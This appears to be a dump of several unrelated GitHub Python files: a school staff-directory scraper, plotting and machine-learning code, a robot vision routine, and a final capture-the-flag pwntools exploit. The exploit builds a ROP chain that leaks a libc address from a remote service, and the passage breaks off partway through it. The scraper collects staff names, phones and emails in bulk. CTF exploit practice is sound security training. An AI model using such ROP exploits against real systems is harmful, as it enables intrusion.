}\n \n def init_request(self,response):\n \n school_name = response.xpath('//div[@class=\"paragraph staff default\"]//div[@class=\"field-content\"]/span/text()').extract_first().strip()\n address1 = response.xpath('//p[@class=\"address\"]/text()[1]').extract_first().strip()\n address2 = response.xpath('//p[@class=\"address\"]/text()[2]').extract_first().strip()\n address = address1+address2\n state = re.findall(r'[A-Z][A-Z]',address2)[0]\n zip_code =re.findall(r\"(?!\\A)\\b\\d{5}(?:-\\d{4})?\\b\",address2)[0]\n names = response.xpath('//div[@class=\"paragraph staff default\"]//h2[@class=\"title\"]/text()').extract()\n job_titles = response.xpath('//div[@class=\"field job-title\"]/text()').extract()\n phones = response.xpath('//div[@class=\"field phone\"]/a/text()').extract()\n emails = response.xpath('//div[@class=\"field email\"]/a/text()').extract()\n \n for name,job_title,phone,email in zip(names,job_titles,phones,emails):\n first_name = name.split(',')[0]\n last_name = name.split(',')[1]\n job_title=job_title.strip()\n yield {\n \"School\":school_name,\n \"Address\":address,\n \"State\":state,\n \"Zip\":zip_code,\n \"First Name\":first_name,\n \"Last Name\":last_name,\n \"Title\":job_title,\n \"Phone\":phone,\n \"Email\":email\n }\n\n def parse(self, response):\n base_url = 'https://isd110.org/our-schools/laketown-elementary/staff-directory?s=&page='\n pagination = response.xpath('//li[@class=\"item last\"]/a/@href').extract_first()\n len_of_pages = pagination.replace('?s=&page=','')\n \n \n \n for page in range(1,int(len_of_pages)+1):\n \n next_page_url = base_url+str(page)\n yield scrapy.Request(next_page_url,callback=self.init_request)\n","repo_name":"Bhupendrasolanki9/Catlyst_assessment","sub_path":"school.py","file_name":"school.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5104943279","text":"from __future__ import division\nfrom __future__ import print_function\nimport argparse\n\nparser = argparse.ArgumentParser(description='Test response of 
model')\nparser.add_argument('results', metavar='', nargs='+', type=argparse.FileType('rb'), help='Filename of results file')\nparser.add_argument('-o', '--output', default=None, type=argparse.FileType('wb'), help='Filename of output file')\nparser.add_argument('--captions', metavar='', nargs='*', type=str, help='Captions')\n\nargs = parser.parse_args()\nresults_files = args.results\ncaptions = args.captions\nif captions:\n assert len(captions) == len(results_files), \"Must supply caption for all\"\n\nif args.output is not None:\n import matplotlib\n matplotlib.use('Agg')\nimport numpy as np\nimport matplotlib.pylab as plt\nimport gv\n\nuse_other_style = False \n\nfig = plt.figure(figsize=(7, 7))\n\nfor i, results_file in enumerate(results_files):\n data = np.load(results_file)\n \n try:\n num_images = data['num_images']\n except:\n num_images = 741\n\n if num_images == 0:\n num_images = 741\n\n detections = data['detections']\n tp_fn = int(data['tp_fn'])\n fppi, miss_rate = gv.rescalc.calc_fppi_miss_rate(detections, tp_fn, num_images)\n\n summary = gv.rescalc.calc_fppi_summary(fppi, miss_rate) \n\n print(results_file.name)\n print('Avg miss rate: {0:.02f}% ({1})'.format(100*summary, summary))\n #print(detections[-10:])\n print()\n\n if captions:\n caption = captions[i]\n else:\n caption = results_file.name\n\n caption = \"{0:.02f}% {1}\".format(100*summary, caption)\n\n ax = fig.add_subplot(1, 1, 1)\n\n ax.set_xscale('log')\n ax.set_yscale('log')\n\n print('fppi', fppi)\n print('miss-rate', miss_rate)\n ax.plot(fppi, miss_rate, '-',label=caption)\n ax.set_xlabel('FPPI')\n ax.set_ylabel('Miss rate')\n ticks = [0.05, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]\n ax.set_yticks(ticks)\n ax.set_yticklabels(map(str, ticks))\n #plt.xlim((0, 1))\n #plt.ylim((0, 1))\n plt.xlim((3*10**-3, 10**0))\n plt.ylim((0.025, 1.0))\n\nplt.legend(loc=3)#fontsize='small')#, framealpha=0.2)\n\nplt.grid()\n#plt.xticks(np.arange(0, 1+0.001, 0.05))\n#plt.yticks(np.arange(0, 1+0.001, 0.05))\nif args.output is not None:\n plt.savefig(args.output)\nelse:\n plt.show()\n\n","repo_name":"gustavla/vision-research","sub_path":"detector/plot_fppi.py","file_name":"plot_fppi.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"37259968571","text":"# 9. 
Given three-digit positive integers A, B, C,\n# a program that counts how many times each digit from 0 to 9 appears in the result of A * B * C\n\ntemp = {i: 0 for i in range(10)}\nA, B, C = map(int, input().split())\nresult = list(str(A * B * C))\nfor i in range(10):\n    temp[i] = result.count(str(i)) # count() already returns an int\nprint(temp)","repo_name":"seohyeon1578/python-programming","sub_path":"수행평가준비/example9.py","file_name":"example9.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70615789265","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nfrom transformers import BertModel\n\nfrom global_config import *\nfrom .hbt import DGCNN_HBT\nfrom utils import sl_loss\n\n\nclass Combine(nn.Module):\n    def __init__(self, schema_num, sbj_type_num):\n        super(Combine, self).__init__()\n        models = []\n        model = DGCNN_HBT(schema_num=schema_num, sbj_type_num=sbj_type_num)\n        model.load_state_dict(torch.load(ROOT_SAVED_MODEL + 'large/swa_8017.ckpt'))\n        for p in model.parameters():\n            p.requires_grad = False\n        models.append(model)\n        model = DGCNN_HBT(schema_num=schema_num, sbj_type_num=sbj_type_num)\n        model.load_state_dict(torch.load(ROOT_SAVED_MODEL + 'large/swa_8012.ckpt'))\n        for p in model.parameters():\n            p.requires_grad = False\n        models.append(model)\n        self.models = nn.ModuleList(models)\n        self.sbj_linear = nn.Sequential(nn.Linear(sbj_type_num * len(models) * 2, sbj_type_num * len(models) * 2),\n                                        nn.Linear(sbj_type_num * len(models) * 2, sbj_type_num * 2))\n        self.obj_linear = nn.Sequential(nn.Linear(schema_num * len(models) * 2, schema_num * len(models) * 2),\n                                        nn.Linear(schema_num * len(models) * 2, schema_num * 2))\n        self.word_linear = nn.Sequential(nn.Linear(len(models), len(models)),\n                                         nn.Linear(len(models), 1))\n        self.point_threshold = 0.5\n        self.sbj_type_num = sbj_type_num\n        self.schema_num = schema_num\n\n    def forward(self, inputs):\n        texts, texts_mask, text_select_indices, sbj_masks, w2vs, hands = inputs\n        text_vecs = []\n        word_vecs = []\n        sbj_points_list = []\n        sbj_inputs = [texts, texts_mask, w2vs, hands]\n        for model in self.models:\n            text_vec, word_pred, sbj_points = model.predicate_1(sbj_inputs)\n            text_vec = text_vec.detach()\n            word_pred = word_pred.detach()\n            sbj_points = sbj_points.detach()\n            text_vecs.append(text_vec)\n            word_vecs.append(word_pred)\n            sbj_points_list.append(sbj_points)\n\n        sbj_points = torch.cat(sbj_points_list, dim=1).permute(0,2,1)\n        word_pred = torch.stack(word_vecs, dim=2)\n        sbj_points = nn.functional.sigmoid(self.sbj_linear(sbj_points).permute(0,2,1))\n        word_pred = nn.functional.sigmoid(self.word_linear(word_pred).squeeze(dim=2))\n\n        obj_points_list = []\n        for text_vec, model in zip(text_vecs, self.models):\n            obj_points = model.predicate_2(text_vec, texts_mask, text_select_indices, sbj_masks)\n            obj_points = obj_points.detach()\n            obj_points_list.append(obj_points)\n        obj_points = torch.cat(obj_points_list, dim=1).permute(0,2,1)\n        obj_points = nn.functional.sigmoid(self.obj_linear(obj_points).permute(0,2,1))\n        return [sbj_points, obj_points, word_pred]\n\n    def calculate_loss(self, preds, y_trues, mask, texts_select_indices):\n        sbj_pred = preds[0]\n        obj_pred = preds[1]\n        word_pred = preds[2]\n\n        sbj_true = y_trues[0]\n        obj_true = y_trues[1]\n        word_true = y_trues[2]\n\n        A = -8\n        a = 0.5\n        b = 1\n        c = 2\n        # sbj loss\n        sbj_mask = mask.unsqueeze(dim=1)\n        sbj_mask_1 = sbj_mask * sbj_true\n        sbj_mask_0 = sbj_mask * (1 - sbj_mask_1)\n        sbj_loss = sl_loss(sbj_pred, sbj_true, A, a, b)\n        # 
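(superseded by the class-balanced weighting below) 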
sbj_loss = sbj_loss * sbj_mask\n sbj_loss_0 = sbj_loss * sbj_mask_0\n sbj_loss_1 = sbj_loss * sbj_mask_1\n sum_0 = sbj_mask_0.sum()\n sum_1 = sbj_mask_1.sum()\n sbj_loss_0 = sbj_loss_0.sum().div(sum_0)\n sbj_loss_1 = sbj_loss_1.sum().div(sum_1)\n rate_0 = (sum_0 + sum_1 - sum_1 * c) / (sum_0 + sum_1)\n sbj_loss = sbj_loss_0 * rate_0 + sbj_loss_1 * (1 - rate_0)\n\n # obj loss\n obj_mask = torch.index_select(mask, 0, texts_select_indices).unsqueeze(dim=1)\n obj_loss = sl_loss(obj_pred, obj_true, A, a, b)\n obj_mask_1 = obj_mask * obj_true\n obj_mask_0 = obj_mask * (1 - obj_mask_1)\n obj_loss_0 = obj_loss * obj_mask_0\n obj_loss_1 = obj_loss * obj_mask_1\n sum_0 = obj_mask_0.sum()\n sum_1 = obj_mask_1.sum()\n obj_loss_0 = obj_loss_0.sum().div(sum_0)\n obj_loss_1 = obj_loss_1.sum().div(sum_1)\n rate_0 = (sum_0 + sum_1 - sum_1 * c) / (sum_0 + sum_1)\n obj_loss = obj_loss_0 * rate_0 + obj_loss_1 * (1 - rate_0)\n\n # word loss\n word_loss = sl_loss(word_pred, word_true, A, a, b)\n word_loss = word_loss * mask\n word_loss = word_loss.sum().div(mask.sum())\n\n loss = sbj_loss + obj_loss * 2.5 + word_loss * 0.015\n return loss\n\n def evaluate(self, inputs, raw_text):\n texts, texts_mask, text_select_indices, sbj_masks, w2vs, hands = inputs\n text_vecs = []\n word_vecs = []\n sbj_points_list = []\n\n sbj_inputs = [texts, texts_mask, w2vs, hands]\n for model in self.models:\n text_vec, word_pred, sbj_points = model.predicate_1(sbj_inputs)\n text_vecs.append(text_vec)\n word_vecs.append(word_pred)\n sbj_points_list.append(sbj_points)\n\n sbj_points = torch.cat(sbj_points_list, dim=1).permute(0,2,1)\n word_pred = torch.stack(word_vecs, dim=2)\n sbj_points = nn.functional.sigmoid(self.sbj_linear(sbj_points).permute(0,2,1))\n word_pred = nn.functional.sigmoid(self.word_linear(word_pred).squeeze(dim=2))\n\n obj_points_list = []\n for text_vec, model in zip(text_vecs, self.models):\n obj_points = model.predicate_2(text_vec, texts_mask, text_select_indices, sbj_masks)\n obj_points_list.append(obj_points)\n obj_points = torch.cat(obj_points_list, dim=1).permute(0,2,1)\n obj_points = nn.functional.sigmoid(self.obj_linear(obj_points).permute(0,2,1))\n\n model = self.models[0]\n sbj_masks, text_select_indices, sbj_entities, sbj_entities_point = model.predicate_1_1(text_vecs[0], sbj_points,\n word_pred, raw_text)\n eval_obj_points_list = []\n for text_vec, model in zip(text_vecs, self.models):\n eval_obj_points = model.predicate_2(text_vec, texts_mask, text_select_indices, sbj_masks)\n eval_obj_points_list.append(eval_obj_points)\n eval_obj_points = torch.cat(eval_obj_points_list, dim=1).permute(0,2,1)\n eval_obj_points = nn.functional.sigmoid(self.obj_linear(eval_obj_points).permute(0,2,1))\n spo_list = model.predicate_2_2(eval_obj_points, text_select_indices, word_pred, sbj_entities,\n sbj_entities_point, raw_text)\n\n return [sbj_points, obj_points, word_pred], spo_list\n\n def predicate(self, inputs, raw_text):\n texts, texts_mask, w2vs, hands = inputs\n text_vecs = []\n word_vecs = []\n sbj_points_list = []\n\n sbj_inputs = [texts, texts_mask, w2vs, hands]\n for model in self.models:\n text_vec, word_pred, sbj_points = model.predicate_1(sbj_inputs)\n text_vecs.append(text_vec)\n word_vecs.append(word_pred)\n sbj_points_list.append(sbj_points)\n\n sbj_points = torch.cat(sbj_points_list, dim=1).permute(0,2,1)\n word_pred = torch.stack(word_vecs, dim=2)\n sbj_points = nn.functional.sigmoid(self.sbj_linear(sbj_points).permute(0,2,1))\n word_pred = 
nn.functional.sigmoid(self.word_linear(word_pred).squeeze(dim=2))\n\n model = self.models[0]\n sbj_masks, text_select_indices, sbj_entities, sbj_entities_point = model.predicate_1_1(text_vecs[0], sbj_points,\n word_pred, raw_text)\n obj_points_list = []\n for text_vec, model in zip(text_vecs, self.models):\n obj_points = model.predicate_2(text_vec, texts_mask, text_select_indices, sbj_masks)\n obj_points_list.append(obj_points)\n obj_points = torch.cat(obj_points_list, dim=1).permute(0,2,1)\n obj_points = nn.functional.sigmoid(self.obj_linear(obj_points).permute(0,2,1))\n spo_point_list = model.predicate_2_2(obj_points, text_select_indices, word_pred, sbj_entities,\n sbj_entities_point, raw_text)\n return spo_point_list\n\n def find_entities(self, text_line, ps, pe, ps_limit_map, pe_limit_map):\n def is_cross_point(a_point, entities_points):\n start_in_flag = False\n end_in_flag = False\n for e_index in range(len(entities_points)):\n for p_index in range(len(entities_points[e_index])):\n if not start_in_flag and entities_points[e_index][p_index][0] < a_point[0] <= \\\n entities_points[e_index][p_index][1]:\n start_in_flag = True\n elif not end_in_flag and entities_points[e_index][p_index][0] <= a_point[1] < \\\n entities_points[e_index][p_index][1]:\n end_in_flag = True\n if start_in_flag and end_in_flag:\n return True\n return False\n\n entities_line = []\n entities_point_line = []\n seq_length = len(text_line)\n start_index = -999\n end_index = 999\n ps_map = np.zeros(seq_length, dtype=np.int)\n pe_map = np.zeros(seq_length, dtype=np.int)\n start_list = []\n end_list = []\n for index in range(seq_length):\n if ps[index]:\n start_index = index\n start_list.append(start_index)\n if pe[seq_length - index - 1]:\n end_index = seq_length - index - 1\n end_list.append(end_index)\n ps_map[index] = start_index\n pe_map[seq_length - index - 1] = end_index\n\n for start_index in start_list:\n end_index = pe_map[start_index]\n if end_index != 999:\n if end_index - start_index > 10:\n if pe_map[start_index] > pe_limit_map[start_index] and pe_limit_map[\n start_index] - start_index > 2:\n end_index = pe_limit_map[start_index]\n pass\n else:\n # self.start_num += 1\n # print('only start', self.start_num)\n continue\n entity = text_line[start_index:end_index + 1]\n entity_point = (start_index, end_index)\n try:\n entity_index = entities_line.index(entity)\n if entity_point not in entities_point_line[entity_index]:\n entities_point_line[entity_index].append(entity_point)\n except ValueError:\n entities_line.append(entity)\n entities_point_line.append([entity_point])\n\n for end_index in end_list:\n start_index = ps_map[end_index]\n if start_index != -999:\n if end_index - start_index > 10:\n if ps_map[end_index] < ps_limit_map[end_index] and end_index - ps_limit_map[end_index] > 2:\n start_index = ps_limit_map[end_index]\n pass\n else:\n # self.end_num += 1\n # print('only end', self.end_num)\n continue\n entity = text_line[start_index:end_index + 1]\n entity_point = (start_index, end_index)\n try:\n entity_index = entities_line.index(entity)\n if entity_point not in entities_point_line[entity_index]:\n entities_point_line[entity_index].append(entity_point)\n except ValueError:\n entities_line.append(entity)\n entities_point_line.append([entity_point])\n\n new_entities_line = []\n new_entities_point_line = []\n for entity_index in range(len(entities_point_line)):\n for point in entities_point_line[entity_index][:]:\n if is_cross_point(point, entities_point_line):\n del 
(entities_point_line[entity_index][entities_point_line[entity_index].index(point)])\n if len(entities_point_line[entity_index]) > 0:\n new_entities_line.append(entities_line[entity_index])\n new_entities_point_line.append(entities_point_line[entity_index])\n # else:\n # print(entities_line[entity_index])\n # print('cross')\n\n return new_entities_line, new_entities_point_line\n # return entities_line, entities_point_line\n\n def find_sbj_entities(self, raw_text, points, words):\n points = points.cpu().numpy()\n words = words.cpu().numpy()\n points = points > self.point_threshold\n words = words > self.point_threshold\n entities = []\n entities_point = []\n\n for batch_index in range(points.shape[0]):\n entities_line = []\n entities_point_line = []\n word_line = words[batch_index]\n start_index = -999\n end_index = 999\n seq_len = len(word_line)\n ps_limit_map = np.zeros(seq_len, dtype=np.int)\n pe_limit_map = np.zeros(seq_len, dtype=np.int)\n for index in range(seq_len):\n if word_line[index]:\n if start_index == -999:\n start_index = index\n else:\n start_index = -999\n if word_line[seq_len - index - 1]:\n if end_index == 999:\n end_index = seq_len - index - 1\n else:\n end_index = 999\n pe_limit_map[seq_len - index - 1] = end_index\n ps_limit_map[index] = start_index\n\n for sbj_type_index in range(self.sbj_type_num):\n eee, ppp = self.find_entities(raw_text[batch_index], points[batch_index][sbj_type_index],\n points[batch_index][sbj_type_index + self.sbj_type_num],\n ps_limit_map, pe_limit_map)\n for eeee, pppp in zip(eee, ppp):\n if eeee not in entities_line:\n entities_line.append(eeee)\n entities_point_line.append(pppp)\n\n entities.append(entities_line)\n entities_point.append(entities_point_line)\n return entities, entities_point\n\n def find_obj_entities(self, raw_text, points, text_indices, words):\n points = points.cpu().numpy()\n words = words.cpu().numpy()\n points = points > self.point_threshold\n words = words > self.point_threshold\n entities = [[] for _ in range(len(raw_text))]\n entities_point = [[] for _ in range(len(raw_text))]\n\n for point_index in range(points.shape[0]):\n batch_index = text_indices[point_index]\n entities_line = []\n entities_point_line = []\n word_line = words[batch_index]\n start_index = -999\n end_index = 999\n seq_len = len(word_line)\n ps_limit_map = np.zeros(seq_len, dtype=np.int)\n pe_limit_map = np.zeros(seq_len, dtype=np.int)\n for index in range(seq_len):\n if word_line[index]:\n if start_index == -999:\n start_index = index\n else:\n start_index = -999\n if word_line[seq_len - index - 1]:\n if end_index == 999:\n end_index = seq_len - index - 1\n else:\n end_index = 999\n pe_limit_map[seq_len - index - 1] = end_index\n ps_limit_map[index] = start_index\n for schema_index in range(self.schema_num):\n eee, ppp = self.find_entities(raw_text[batch_index], points[point_index][schema_index],\n points[point_index][schema_index + self.schema_num],\n ps_limit_map, pe_limit_map)\n entities_line.append(eee)\n entities_point_line.append(ppp)\n\n entities[batch_index].append(entities_line)\n entities_point[batch_index].append(entities_point_line)\n return entities, entities_point\n\n def get_spo_list(self, sbj_entities, obj_entities, sbj_entities_point=None, obj_entities_point=None):\n spo_list = []\n spo_point_list = []\n for batch_index in range(len(sbj_entities)):\n spo_list.append([])\n spo_point_list.append([])\n for sbj_index in range(len(sbj_entities[batch_index])):\n for schema_index in range(self.schema_num):\n for obj_index in 
range(len(obj_entities[batch_index][sbj_index][schema_index])):\n spo_list[batch_index].append([sbj_entities[batch_index][sbj_index],\n schema_index,\n obj_entities[batch_index][sbj_index][schema_index][\n obj_index]])\n if sbj_entities_point is not None:\n spo_point_list[batch_index].append([sbj_entities_point[batch_index][sbj_index],\n schema_index,\n obj_entities_point[batch_index][sbj_index][\n schema_index]\n [obj_index]])\n return spo_list, spo_point_list\n\n def calculate_train_f1(self, raw_text, preds, y_trues, text_select_indices):\n sbj_points = preds[0]\n obj_points = preds[1]\n word_pred = preds[2]\n\n sbj_entities_true = y_trues[0]\n spo_true = y_trues[1]\n\n sbj_entities_pred, _ = self.find_sbj_entities(raw_text, sbj_points, word_pred)\n obj_entities_pred, _ = self.find_obj_entities(raw_text, obj_points, text_select_indices, word_pred)\n spo_pred, _ = self.get_spo_list(sbj_entities_true, obj_entities_pred)\n\n sbj_correct_num = sbj_pred_num = sbj_true_num = 0\n for batch_index in range(len(sbj_entities_pred)):\n for sbj in sbj_entities_pred[batch_index]:\n if sbj in sbj_entities_true[batch_index]:\n sbj_correct_num += 1\n sbj_pred_num += len(sbj_entities_pred[batch_index])\n sbj_true_num += len(sbj_entities_true[batch_index])\n\n spo_correct_num = spo_pred_num = spo_true_num = 0\n for batch_index in range(len(spo_pred)):\n for spo in spo_pred[batch_index]:\n if spo in spo_true[batch_index]:\n spo_correct_num += 1\n spo_pred_num += len(spo_pred[batch_index])\n spo_true_num += len(spo_true[batch_index])\n\n return [sbj_correct_num, sbj_pred_num, sbj_true_num], [spo_correct_num, spo_pred_num, spo_true_num]","repo_name":"BaberMuyu/relation-extraction","sub_path":"model/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":19349,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"48"} +{"seq_id":"15729090215","text":"import numpy as np\nimport cv2\nfrom settings import BoltSettings\n\n__author__ = 'Karl'\n\n\nclass GetCoordinates:\n\n\tdef __init__(self):\n\t\tpass\n\n\t@staticmethod\n\tdef get_coordinates():\n\n\t\t# Load Global Settings\n\t\tst = BoltSettings()\n\t\tsettings_dict = st.read_dict()\n\n\t\tcap = cv2.VideoCapture(0)\n\n\t\tret, frame = cap.read()\n\n\t\tif not ret:\n\t\t\tprint(\"No image\")\n\t\t\tprint(frame)\n\t\t\treturn {\"ball\": -1, \"blue\": -1, \"yellow\": -1, \"black\": -1}\n\n\t\thsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\t\tcolours = [\"black\", \"blue\", \"yellow\", \"ball\"]\n\t\tcoordinates_dict = {\"ball\": -1, \"blue\": -1, \"yellow\": -1, \"black\": -1}\n\n\t\tfor i in range(4):\n\t\t\tcolour = colours[i]\n\t\t\th_low = int(settings_dict['H_low_' + colour])\n\t\t\th_top = int(settings_dict['H_top_' + colour])\n\t\t\ts_low = int(settings_dict['S_low_' + colour])\n\t\t\ts_top = int(settings_dict['S_top_' + colour])\n\t\t\tv_low = int(settings_dict['V_low_' + colour])\n\t\t\tv_top = int(settings_dict['V_top_' + colour])\n\n\t\t\tlower_colour = np.array([h_low, s_low, v_low])\n\t\t\tupper_colour = np.array([h_top, s_top, v_top])\n\t\t\tmask = cv2.inRange(hsv, lower_colour, upper_colour)\n\n\t\t\tkernel = np.ones((10, 10), np.uint8)\n\n\t\t\t# combining smaller blobs\n\t\t\tdilated = cv2.dilate(mask, kernel, iterations=2)\n\n\t\t\t# Detect blobs.\n\t\t\t_, contours, _ = cv2.findContours(dilated, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n\n\t\t\t# Getting the biggest blob's coordinates (that is probably the closest object)\n\t\t\tbiggest_area = 0\n\t\t\tcoordinates = -1\n\t\t\tfor cnt in 
contours:\n\t\t\t\t# width = cv2.contourArea(cnt)\n\t\t\t\trect = cv2.minAreaRect(cnt)\n\t\t\t\twidth = rect[1][0]\n\t\t\t\theight = rect[1][1]\n\t\t\t\tarea = width * height\n\n\t\t\t\tif width < 5 and (colour == \"yellow\" or colour == \"blue\"):\n\t\t\t\t\tcontinue\n\n\t\t\t\tif area > biggest_area:\n\t\t\t\t\tmoment = cv2.moments(cnt)\n\t\t\t\t\ttry:\n\t\t\t\t\t\tcx = int(moment['m10']/moment['m00'])\n\t\t\t\t\t\tcy = int(moment['m01']/moment['m00'])\n\t\t\t\t\texcept ZeroDivisionError:\n\t\t\t\t\t\tprint(\"zero division\")\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tbiggest_area = area\n\t\t\t\t\tif colour == \"ball\":\n\t\t\t\t\t\tblack = coordinates_dict[\"black\"]\n\t\t\t\t\t\t# print(\"black: \" + str(black))\n\t\t\t\t\t\t# print(\"ball: \" + str(cx) + \", \" + str(cy))\n\t\t\t\t\t\tif black != -1:\n\t\t\t\t\t\t\tblack_x = black[0]\n\t\t\t\t\t\t\tblack_y = black[1]\n\t\t\t\t\t\t\tblack_width = black[2]\n\t\t\t\t\t\t\tif black_y > cy and black_x + black_width / 2 > cx > black_width / 2 - black_x: # ball is out of the field\n\t\t\t\t\t\t\t\tprint(\"ball out of field\")\n\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tcoordinates = (cx, cy, width, height)\n\t\t\tcoordinates_dict[colour] = coordinates\n\n\t\tcap.release()\n\n\t\treturn coordinates_dict\n","repo_name":"Karl-Mattias/Robotics2015","sub_path":"get_coordinates.py","file_name":"get_coordinates.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74012619024","text":"from typing import Tuple\n\n# import lap\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom fdsa.utils.gale_shapley import GaleShapley\nfrom scipy.optimize import linear_sum_assignment\n\n\nclass MapperSetsAE(nn.Module):\n \"\"\"Mapping Algorithm for Sets AutoEncoder.\"\"\"\n\n def __init__(\n self,\n matcher='HM',\n p: int = 2,\n device: torch.device = torch.\n device('cuda' if torch.cuda.is_available() else 'cpu')\n ) -> None:\n \"\"\"Constructor.\n\n Args:\n matcher (string): The matching algorithm to use.\n One of 'HM' (Munkres version of the Hungarian algorithm),\n or 'GS' (Gale-Shapley algorithm).\n Defaults to 'HM'.\n p (int, optional): the p-norm to use when calculating the\n cost matrix. Defaults to 2.\n device (torch.device): Device on which to run the model.\n Defaults to CPU.\n \"\"\"\n super(MapperSetsAE, self).__init__()\n self.p = p\n self.matcher = matcher\n self.method = dict(\n {\n 'HM': self.get_assignment_matrix_hm,\n 'GS': self.get_assignment_matrix_gs\n }\n )\n\n self.device = device\n\n def get_assignment_matrix_hm(self, cost_matrix: torch.Tensor) -> torch.Tensor:\n \"\"\"Runs the Munkres version of the Hungarian algorithm.\n\n Args:\n cost_matrix (torch.Tensor): A 2-D tensor that represents the cost\n of matching a row (input) and column (output). 
Has dimensions\n N x M, where N is the length of inputs and M the length of\n outputs.\n\n Returns:\n Tuple: Tuple of 2-D binary matrix with the same dimensions as the\n cost matrix, where 1 represents a match and 0 otherwise, and\n row-wise nonzero indices of the matrix.\n \"\"\"\n matrix = torch.zeros_like(cost_matrix)\n rows, cols = linear_sum_assignment(cost_matrix.detach().cpu().numpy())\n matrix[rows, cols] = 1\n\n return torch.as_tensor(matrix), cols\n\n # def get_assignment_matrix_vj(\n # self, cost_matrix: torch.Tensor\n # ) -> torch.Tensor:\n # \"\"\"Runs the Jonker-Volgenant algorithm.\n\n # Args:\n # cost_matrix (torch.Tensor): A 2-D tensor that represents the cost\n # of matching a row (input) and column (output). Has dimensions\n # N x M, where N is the length of inputs and M the length of\n # outputs.\n\n # Returns:\n # Tuple: Tuple of 2-D binary matrix with the same dimensions as the\n # cost matrix, where 1 represents a match and 0 otherwise, and\n # row-wise nonzero indices of the matrix.\n # \"\"\"\n # matrix = torch.zeros_like(cost_matrix)\n # cost, cols, rows = lap.lapjv(\n # cost_matrix.detach().cpu().numpy(), extend_cost=True\n # )\n # matrix[range(len(cols)), cols] = 1\n\n # return torch.as_tensor(matrix), cols\n\n def get_assignment_matrix_gs(self, cost_matrix: torch.Tensor) -> torch.Tensor:\n \"\"\"Runs the Gale-Shapley Stable Marriage algorithm.\n\n Args:\n cost_matrix (torch.Tensor): A 2-D tensor that represents the cost\n of matching a row (input) and column (output). Has dimensions\n N x M, where N is the length of inputs and M the length of\n outputs.\n\n Returns:\n Tuple: Tuple of 2-D binary matrix with the same dimensions as the\n cost matrix, where 1 represents a match and 0 otherwise, and\n row-wise nonzero indices of the matrix.\n \"\"\"\n\n gs = GaleShapley(cost_matrix.size()[0], cost_matrix.size()[1])\n binary_matrix = gs.compute(cost_matrix)\n rows, cols = np.nonzero(binary_matrix)\n return binary_matrix, cols\n\n def output_mapping(\n self, outputs: torch.Tensor, match_matrix: torch.Tensor\n ) -> torch.Tensor:\n \"\"\"Orders the outputs based on the match matrix.\n\n Args:\n outputs (torch.Tensor): The set of outputs generated by the decoder.\n match_matrix (torch.Tensor): A 2-D binary matrix, where 1\n represents a match and 0 otherwise.\n Has the same dimensions as the cost matrix.\n Returns:\n torch.Tensor: Outputs ordered in correspondence with inputs.\n \"\"\"\n return (match_matrix[..., None] * outputs[None, ...]).sum(dim=1)\n\n def forward(\n self, inputs: torch.Tensor, stacked_outputs: torch.Tensor,\n member_probabilities: torch.Tensor\n ) -> Tuple:\n \"\"\"Computes cost matrix and performs a matching between inputs and outputs.\n\n Args:\n inputs (torch.Tensor): Input tensor of shape\n [batch_size x sequence_length x input_size].\n stacked_outputs (torch.Tensor): Reconstructed elements from the\n decoder with shape [batch_size, max_length, input_size].\n member_probabilities (torch.Tensor): Probabilities describing the\n likelihood of elements belonging to the set.\n\n Returns:\n Tuple: Tuple of the outputs and their membership probabilities\n reordered with respect to the input.\n \"\"\"\n\n in_batch_size, input_length, input_size = inputs.size()\n out_batch_size, output_length, output_size = stacked_outputs.size()\n mapped_outputs = []\n\n with torch.no_grad():\n cost_matrices = list(\n map(torch.cdist, inputs, stacked_outputs, [self.p] * in_batch_size)\n )\n\n match_matrices, cols = map(\n list, zip(*map(self.method[self.matcher], 
cost_matrices))\n )\n\n mapped_outputs = list(map(self.output_mapping, stacked_outputs, match_matrices))\n\n mapped_prob = list(\n map(self.output_mapping, member_probabilities, match_matrices)\n )\n\n return torch.stack(mapped_outputs), torch.stack(mapped_prob), np.stack(cols)\n","repo_name":"PaccMann/fdsa","sub_path":"fdsa/utils/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":6095,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"34126037868","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom pwn import *\n\nexe = context.binary = ELF('./xored')\n\nhost = args.HOST or 'io.ept.gg'\nport = int(args.PORT or 30012)\n\ndef start_local(argv=[], *a, **kw):\n '''Execute the target binary locally'''\n if args.GDB:\n return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)\n else:\n return process([exe.path] + argv, *a, **kw)\n\ndef start_remote(argv=[], *a, **kw):\n '''Connect to the process on the remote host'''\n io = connect(host, port)\n if args.GDB:\n gdb.attach(io, gdbscript=gdbscript)\n return io\n\ndef start(argv=[], *a, **kw):\n '''Start the exploit against the target.'''\n if args.LOCAL:\n return start_local(argv, *a, **kw)\n else:\n return start_remote(argv, *a, **kw)\n\ngdbscript = '''\nb *main\nb *main+394\n\ncontinue\n'''.format(**locals())\nlibc = ELF('./libc.so.6')\n# -- Exploit goes here --\nfrom itertools import cycle\ndef xorpayload(payload):\n key = b'KuCOLc5PIH3mgP6nJxF3DBHXbDHSqM0Y'\n res = b\"\".join([bytes([(c1^c2)]) for (c1,c2) in zip(payload,cycle(key))])\n return res\nrop = ROP(exe)\nrop.puts(exe.got.fgets)\nrop.call(rop.ret.address)\nrop.main()\nio = 